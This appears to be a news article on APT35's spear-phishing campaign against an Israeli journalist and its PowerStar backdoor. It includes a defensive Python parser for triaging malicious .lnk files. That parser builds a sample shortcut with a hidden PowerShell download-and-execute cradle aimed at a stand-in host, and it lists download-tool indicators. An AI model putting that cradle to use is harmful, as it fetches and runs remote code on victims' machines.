    Iran-Linked APT35 Targets Israeli Media With Upgraded Spear-Phishing Tools

By justmattg, July 2, 2023

The Iran-linked threat group known as APT35 (aka Charming Kitten, Imperial Kitten, or Tortoiseshell) has updated its toolset with better evasion and an upgraded custom backdoor, which it is distributing through a spear-phishing campaign.

The advanced persistent threat (APT) is alleged to operate out of Iran and to focus on intelligence collection: it phishes account credentials from carefully chosen individuals and then uses those credentials to read the victims' email.

According to a blog post published by Volexity, the group recently ran a spear-phishing campaign against an Israeli journalist using a "draft report" lure. The "draft report" was a password-protected RAR archive containing a malicious LNK (Windows shortcut) file that downloaded a backdoor. Password-protecting the archive is a common way to keep mail gateways and antivirus from inspecting the contents.

The incident was a highly targeted attack. Before sending any malware, the attackers asked whether the journalist would be willing to review a document they had written on US foreign policy. The target agreed, since this is a routine request in journalism, but APT35 did not send the file right away. Instead, the attackers continued the exchange with another benign email containing a list of questions, which the target answered. Only after several days of seemingly legitimate back-and-forth did the attackers send the malware-laden "draft report".

Toby Lewis, global head of threat analysis at Darktrace, says APT35's targeting profile is very much what you would expect from a group associated with the Iranian government. He says: "This is a group that's trying to be bespoke, be stealthy, and stay under the radar, and so to do that you're also going to really focus your social engineering to try and improve that return on the investment."

    PowerStar Malware & Evolving Spear-Phishing Techniques

In this most recent campaign, the group delivered PowerStar, an updated version of its known CharmPower backdoor, via an email carrying a password-protected .RAR archive that held the .LNK file.

When the user opens the .LNK file, it downloads PowerStar from the Backblaze hosting provider and from attacker-controlled infrastructure, according to Volexity's report. PowerStar then collects a small amount of system information from the compromised machine and sends it in a POST request to a command-and-control (C2) address that is itself downloaded from Backblaze. Staging through a legitimate file-hosting service means the initial download blends in with ordinary outbound traffic, and the attackers can rotate the C2 address without touching the implant.
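As an added example (not code from the original article, from Volexity, or from the malware itself), here is a minimal Python parser for Windows Shell Link (.lnk) files that pulls out the fields an analyst would check on an attachment like the one described above (target, arguments, working directory, icon, window state) and applies simple triage heuristics for a downloader LNK. The two sample LNK files are constructed inline from the MS-SHLLINK layout; the PowerShell command line, the `example.invalid` URL and the paths in them are invented stand-ins, not PowerStar's real loader or infrastructure, and the heuristics are this example's own, not Volexity's detection logic.

```python
"""Minimal MS-SHLLINK (.lnk) parser with triage heuristics for downloader shortcuts.
Sample files are constructed below; nothing here is a real APT35 artifact."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData sections appear in this fixed order when their flag is set (MS-SHLLINK 2.4).
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# Heuristic indicator lists (this example's own choices, not a vendor signature).
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32")
DOWNLOAD_MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
                    "invoke-webrequest", "iwr ", "iex", "invoke-expression", "-enc",
                    "frombase64string", "bitsadmin", "curl ", "certutil")


def parse_lnk(data: bytes) -> dict:
    """Validate the 76-byte header, skip the ID list and LinkInfo, decode StringData."""
    if (len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:
        id_list_size = struct.unpack_from("<H", data, pos)[0]  # size excludes this field
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        link_info_size = struct.unpack_from("<I", data, pos)[0]  # size includes itself
        pos += link_info_size
    fields = {"flags": flags, "show_command": show_cmd}
    is_unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # character count, no terminator
        pos += 2
        raw_len = count * 2 if is_unicode else count
        raw = data[pos:pos + raw_len]
        pos += raw_len
        fields[name] = raw.decode("utf-16-le") if is_unicode else raw.decode("cp1252")
    return fields


def triage(fields: dict) -> list:
    """Return human-readable findings for a parsed shortcut."""
    findings = []
    target = (fields.get("relative_path", "") + " " + fields.get("name", "")).lower()
    args = fields.get("arguments", "").lower()
    icon = fields.get("icon_location", "").lower()
    if any(h in target for h in SCRIPT_HOSTS):
        findings.append("target is a script host")
    if any(m in args for m in DOWNLOAD_MARKERS):
        findings.append("arguments contain a download/execute cradle")
    if fields.get("show_command") == 7:  # SW_SHOWMINNOACTIVE: console opens minimized
        findings.append("window is launched minimized")
    if icon and any(h in target for h in SCRIPT_HOSTS) and not any(h in icon for h in SCRIPT_HOSTS):
        findings.append("icon borrowed from another program (masquerading)")
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str,
              icon_location: str, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode LNK (no LinkInfo) for testing; layout per MS-SHLLINK."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIqqqIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    item_id = struct.pack("<H", 4) + b"\x1f\x50"      # one dummy ItemID (size includes itself)
    id_list = item_id + b"\x00\x00"                     # TerminalID
    id_list = struct.pack("<H", len(id_list)) + id_list
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, working_dir, arguments, icon_location))
    return header + id_list + strings


# Constructed samples: a downloader shortcut dressed up as a Word document, and a benign one.
MALICIOUS_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "%TEMP%",
    '-w hidden -nop -c "IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/report.ps1\')"',
    r"%ProgramFiles%\Microsoft Office\root\Office16\WINWORD.EXE", show_command=7)
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe", "", "", "")

if __name__ == "__main__":
    for label, blob in (("draft_report.lnk", MALICIOUS_LNK), ("notes.lnk", BENIGN_LNK)):
        fields = parse_lnk(blob)
        print(label, {k: v for k, v in fields.items() if k != "flags"})
        print("  findings:", triage(fields) or "none")
```

In practice the same parser can be run over every .lnk extracted from an archive before it reaches a user; the combination of a script-host target, a download cradle in the arguments, a minimized window and an Office icon is exactly the profile of a "document" shortcut that launches a downloader.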

Volexity assesses this PowerStar variant as especially complex and suspects it is backed by a custom server-side component that automates routine actions for the operator. The routine that decrypts the backdoor's main functionality is not part of the initial payload; it is fetched from remotely hosted files, which hampers detection of the malware anywhere except in memory and gives the attackers a kill switch: once the hosted decryption routine is removed, the payload can no longer be decrypted or analysed.

    “With PowerStar, Charming Kitten sought to limit the risk of exposing their malware to analysis and detection by delivering the decryption method separately from the initial code and never writing it to disk,” the company said. “This has the added bonus of acting as an operational guardrail, as decoupling the decryption method from its command-and-control server prevents future successful decryption of the corresponding PowerStar payload.”

Lewis says that quest for return on investment sometimes drives APT groups toward relatively unsophisticated, low-effort campaigns, but more often, "you've got groups that are going to get as sophisticated as they need to be to meet their objectives." What that means runs the gamut: some will be able to develop zero-days rather than reusing something obtained from someone else; others will show their sophistication in how they manage and control their infrastructure.

    The latter is the case with APT35. “When you’ve got the trade craft that we’ve got this group using, effectively bringing down custom payloads, it’s bringing down different modules from third party services,” he says. “Each different payload is going to be a little bit different, a little bit tweaked, and a little bit tuned, and … that sort of approach is absolutely what you’d expect to see.”

Nonetheless, Volexity researchers said they regularly observe operations from the APT but find that the group rarely deploys malware as part of its attacks. "This sparing use of malware in their operations likely increases the difficulty of tracking their attacks," according to the firm.

APT35 has been active for more than a decade. According to a 2021 blog from Darktrace, the group has in that time run extensive campaigns against organizations and officials across North America and the Middle East, and public attribution has characterized it as an Iran-based nation-state threat actor. Recent campaigns were suspected of supporting Iran's potential physical targeting of dissidents for kidnapping and other kinetic operations.
